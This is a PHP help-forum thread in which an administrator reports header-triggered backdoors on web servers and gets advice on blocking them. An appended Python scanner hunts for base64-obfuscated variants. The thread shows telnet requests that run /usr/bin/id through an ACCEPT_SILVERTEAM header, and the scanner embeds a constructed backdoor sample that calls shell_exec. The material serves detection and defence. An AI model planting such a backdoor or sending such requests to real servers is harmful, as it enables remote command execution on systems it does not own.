jeev Posted November 12, 2007

So I do freelance administration. I really don't know much about coding in PHP, but I can figure some out. I've set up monitoring scripts on all 200 servers, and they're a pretty big adult company. They have an in-house programmer, and he's good, but some things just keep getting through. This is the second time: the first 100 times I found r57 shell and stuff like that on the servers. Now I'm finding these:

    $verify_member = getenv(base64_decode("SFRUUF9BQ0NFUFRfU0lMVkVSVEVBTQ=="));

I guess that pretty much comes out to ACCEPT_SILVERTEAM, and I've tested it; you can force a lot of things with that. Example:

    $ telnet www.x 80
    Trying x...
    Connected to x.
    Escape character is '^]'.
    GET /treepad/pics/temp/lol.php HTTP/1.1
    Host: www.x
    ACCEPT_xfiles: /usr/bin/id

    HTTP/1.1 200 OK
    Date: Sun, 22 Jul 2007 06:29:15 GMT
    Server: Apache/2.0.54 (Fedora)
    X-Powered-By: PHP/5.0.4
    Content-Length: 62
    Connection: close
    Content-Type: text/html

    uid=48(apache) gid=48(apache) groups=48(apache),2523(psaserv)

That was the first script; the second one was pretty much the same. You can pass, have it download... blah blah, more backdoors. How do I prevent this, other than good coding? a) I don't think they use base64_decode, so I'd like to disallow that; I think I can pass that in php.ini, I recall. But how do I stop "ACCEPT_"-type commands? Thanks in advance.

https://forums.phpfreaks.com/topic/76953-solved-hacked-issues-with-denying-certain-functions/
trq Posted November 12, 2007

I'm not sure I understand this well enough to help much, but you could quite easily create a script that searches the $_REQUEST array looking to see if it holds an ACCEPT_* key.

    <?php
    // Look at the key of each GET/POST/cookie parameter, not its value
    foreach ($_REQUEST as $key => $value) {
        // 'ACCEPT_' is seven characters, so compare seven
        if (substr($key, 0, 7) === 'ACCEPT_') {
            die();
        }
    }
    ?>

I'm really not sure this will help, but it may be a start.
jeev Posted November 12, 2007 (Author)

Thank you so much, but I wouldn't even know where to begin with what you gave me; I really do not understand it. I just would like to know how I could prevent ACCEPT_ from being passed and accepted in PHP. But the first thing I'm gonna do is deny base64_decode.
trq Posted November 12, 2007

Well, providing I'm on the right track, the easiest approach would be to place the snippet I provided in a file:

    /usr/local/deny_accept.php

And then add the line

    auto_prepend_file = "/usr/local/deny_accept.php"

to your php.ini. Like I said, I'm not 100% sure this would work, but it may be worth at least showing your programmer my idea.
jeev Posted November 12, 2007 (Author)

Ahh, wow. I will try it tomorrow morning and let you know. Thank you so much.
jeev Posted November 12, 2007 (Author)

:/ I tried it and it still goes. I had verified auto_prepend_file was working properly; permissions were wrong initially, but they load now. It doesn't stop it:

    Escape character is '^]'.
    GET /members/j.php HTTP/1.1
    Host: x
    ACCEPT_SILVERTEAM: /usr/bin/id

    HTTP/1.1 200 OK
    Date: Mon, 12 Nov 2007 17:09:40 GMT
    Server: Apache/1.3.37 (Unix) PHP/4.4.7
    X-Powered-By: PHP/4.4.7
    Transfer-Encoding: chunked
    Content-Type: text/html

    27
    uid=80(www) gid=80(www) groups=80(www)

    0
jeev Posted November 12, 2007 (Author)

    <?php
    // Request headers as Apache received them (keys are the header names)
    $headers = apache_request_headers();
    foreach ($headers as $key => $value) {
        // Case-insensitive match on the first seven characters
        if (strtoupper(substr($key, 0, 7)) === 'ACCEPT_') {
            die();
        }
    }
    ?>

That worked! Also, disable_functions = shell_exec and base64_decode. We don't use base64_decode, so I put that in for now, and I'm leaving the prepend out till I can make sure it doesn't break the whole environment. It's over 150 servers, so... base64_decode is fine for now because it is not used anywhere else.
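An added example, not code from the thread or from either poster: a Python scanner for the backdoor family described in the first post, where the HTTP_* environment name (and often the command-execution function as well) is hidden behind base64_decode() so that a plain grep for shell_exec or for the header name finds nothing. It decodes every base64-looking string literal in each .php file and flags those that decode to a non-standard HTTP_* name or to a code/command execution function; it also flags getenv()/$_SERVER lookups of non-standard headers and lookups whose name comes straight out of base64_decode(). The two PHP samples embedded in it are constructed for this example and modelled on the snippet in the thread (the base64 literal from the first post decodes to HTTP_ACCEPT_SILVERTEAM, which is what the request header ACCEPT_SILVERTEAM becomes after the CGI conversion to uppercase, underscores and the HTTP_ prefix). The allowlist of standard headers and the list of execution functions are this example's own choices, not anything from the page.

```python
"""Hunt PHP sources for header-triggered backdoors whose header name and
execution function are hidden behind base64_decode()."""
import base64
import binascii
import re
import sys
from dataclasses import dataclass
from pathlib import Path
from typing import Iterator, List, Optional, Tuple

# Quoted base64-looking literal: 12+ alphabet characters, optional '=' padding
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{12,}={0,2})['"]""")
# Plain-text lookup of a request-header env var: getenv('HTTP_X'), $_SERVER['HTTP_X']
HEADER_LOOKUP = re.compile(
    r"""(?:getenv\s*\(|\$_SERVER\s*\[|\$HTTP_SERVER_VARS\s*\[)\s*['"]HTTP_([A-Z0-9_]+)['"]""")
# Lookup whose name is produced at runtime: getenv(base64_decode(...)), $_SERVER[base64_decode(...)]
OBFUSCATED_LOOKUP = re.compile(r"(?:getenv|\$_SERVER)\s*[\(\[]\s*base64_decode\s*\(", re.IGNORECASE)

# Headers a browser or proxy normally sends (assumed allowlist; extend for your apps).
# Anything else arriving as HTTP_* is attacker-controlled and worth a look.
STANDARD_HEADERS = {
    "HOST", "USER_AGENT", "ACCEPT", "ACCEPT_LANGUAGE", "ACCEPT_ENCODING",
    "ACCEPT_CHARSET", "CONNECTION", "KEEP_ALIVE", "COOKIE", "REFERER",
    "CACHE_CONTROL", "PRAGMA", "AUTHORIZATION", "X_FORWARDED_FOR",
    "X_REQUESTED_WITH", "IF_MODIFIED_SINCE", "IF_NONE_MATCH", "RANGE", "ORIGIN",
}
# PHP functions that run commands or code; a base64 literal decoding to one is a red flag
EXEC_FUNCS = {"shell_exec", "exec", "system", "passthru", "popen", "proc_open", "eval", "assert"}


@dataclass(frozen=True)
class Finding:
    line: int
    kind: str       # "obfuscated_lookup", "custom_header" or "hidden_exec_func"
    evidence: str


def decode_literal(lit: str) -> Optional[str]:
    """Strictly decode a base64 literal; None unless it yields printable ASCII.
    Ordinary words that happen to match the alphabet fail padding or decode to junk."""
    try:
        text = base64.b64decode(lit, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def scan_source(src: str) -> List[Finding]:
    """Return every suspicious construct in one PHP source, with its line number."""
    findings: List[Finding] = []
    for lineno, line in enumerate(src.splitlines(), start=1):
        if OBFUSCATED_LOOKUP.search(line):
            findings.append(Finding(lineno, "obfuscated_lookup", line.strip()))
        for m in HEADER_LOOKUP.finditer(line):
            if m.group(1) not in STANDARD_HEADERS:
                findings.append(Finding(lineno, "custom_header", "HTTP_" + m.group(1)))
        for m in B64_LITERAL.finditer(line):
            text = decode_literal(m.group(1))
            if text is None:
                continue
            if text.startswith("HTTP_") and text[5:] not in STANDARD_HEADERS:
                findings.append(Finding(lineno, "custom_header", f"{m.group(1)} -> {text}"))
            elif text.lower() in EXEC_FUNCS:
                findings.append(Finding(lineno, "hidden_exec_func", f"{m.group(1)} -> {text}"))
    return findings


def scan_tree(root: Path) -> Iterator[Tuple[Path, Finding]]:
    """Walk a document root and yield (path, finding) for every .php file."""
    for path in root.rglob("*.php"):
        try:
            src = path.read_text(errors="replace")
        except OSError:
            continue
        for finding in scan_source(src):
            yield path, finding


# Constructed sample modelled on the snippet in the thread (not a file from the servers):
# the header name and shell_exec are both hidden behind base64.
BACKDOOR_PHP = '''<?php
$verify_member = getenv(base64_decode("SFRUUF9BQ0NFUFRfU0lMVkVSVEVBTQ=="));
if ($verify_member) {
    $run = base64_decode("c2hlbGxfZXhlYw==");
    echo $run($verify_member);
}
?>'''

# Constructed benign sample: ordinary use of standard headers, no obfuscation.
BENIGN_PHP = '''<?php
$ua = $_SERVER['HTTP_USER_AGENT'];
$lang = getenv('HTTP_ACCEPT_LANGUAGE');
echo htmlspecialchars($ua . ' ' . $lang);
?>'''

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, f in scan_tree(Path(sys.argv[1])):
            print(f"{path}:{f.line}: {f.kind}: {f.evidence}")
    else:
        for f in scan_source(BACKDOOR_PHP):
            print(f"<constructed sample>:{f.line}: {f.kind}: {f.evidence}")
```

Run it with a document root as the only argument to sweep real files, or with no argument to see what it reports on the constructed backdoor. It is a grep-level heuristic for this one family: an attacker who splits the literal, uses str_rot13() or gzinflate(), or builds the name character by character walks past it, so it complements rather than replaces file-integrity monitoring of the web roots and the request-header filter from the last post. For the same reason, disabling base64_decode in php.ini removes one obfuscation layer but not the underlying trick, which is simply that any request header reaches PHP as an HTTP_* variable under an attacker-chosen name.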